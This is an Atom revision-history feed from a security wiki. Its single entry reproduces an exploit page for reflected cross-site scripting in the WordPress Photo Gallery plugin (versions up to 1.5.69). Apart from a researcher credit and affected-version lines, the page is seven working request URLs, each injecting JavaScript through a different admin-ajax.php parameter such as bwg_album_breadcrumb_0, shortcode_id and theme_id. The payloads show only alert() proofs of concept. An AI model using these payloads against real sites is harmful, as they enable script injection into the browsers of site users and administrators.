<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E</id>
	<title>WordPress Photo Gallery 1.5.69 跨站腳本漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T00:11:36Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E&amp;diff=1747&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability Researcher Name: ThuraMoeMyint Twitter: https://twitter.com/mgthuramoemyint Vendor Url: https:/...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=WordPress_Photo_Gallery_1.5.69_%E8%B7%A8%E7%AB%99%E8%85%B3%E6%9C%AC%E6%BC%8F%E6%B4%9E&amp;diff=1747&amp;oldid=prev"/>
		<updated>2021-04-20T03:09:37Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability Researcher Name: ThuraMoeMyint Twitter: https://twitter.com/mgthuramoemyint Vendor Url: https:/...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
WordPress Photo Gallery 1.5.69 Cross Site Scripting Vulnerability&lt;br /&gt;
Researcher Name: ThuraMoeMyint&lt;br /&gt;
Twitter: https://twitter.com/mgthuramoemyint&lt;br /&gt;
Vendor Url: https://wordpress.org/plugins/photo-gallery/&lt;br /&gt;
 &lt;br /&gt;
&amp;quot;Photo Gallery by 10Web / Mobile-Friendly Image Gallery&amp;quot; (photo-gallery) Multiple RXSS&lt;br /&gt;
 &lt;br /&gt;
The parameter bwg_album_breadcrumb_0 is able to inject malicious javascript code.&lt;br /&gt;
Affected Version &amp;lt; 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;bwg_album_breadcrumb_0=[{&amp;quot;id&amp;quot;:&amp;quot;1'&amp;gt;&amp;lt;img/src=x onerror=alert(1)&amp;gt;&amp;quot;,&amp;quot;page&amp;quot;:1},{&amp;quot;id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;page&amp;quot;:1}]&amp;amp;gallery_type=album_extended_preview&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;shortcode_id&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt; 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;gallery_type=image_browser&amp;amp;gallery_id=5&amp;amp;tag=0&amp;amp;album_id=0&amp;amp;theme_id=1&amp;amp;shortcode_id=9%22%20onmouseover=alert(id)//&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;album_gallery_id_0&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt;= 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;album_gallery_id_0=%27);}%20alert(1);//&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;bwg_album_search_0&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt;= 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;bwg_album_search_0=%22%20autofocus%20onfocus%3D%22alert(1)&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;tag&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt;= 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;tag=%22%20onmouseover=alert(1)%3E&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;type_0&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt;= 1.5.68&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;type_0=%27);}%20alert(document.domain);//&lt;br /&gt;
 &lt;br /&gt;
The parameter &amp;quot;theme_id&amp;quot; is able to inject malicious javascript.&lt;br /&gt;
Affected Version &amp;lt;= 1.5.69&lt;br /&gt;
 &lt;br /&gt;
vuln.com/wp-admin/admin-ajax.php?action=bwg_frontend_data&amp;amp;theme_id=%22%20onmouseover=alert(1)%3E&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>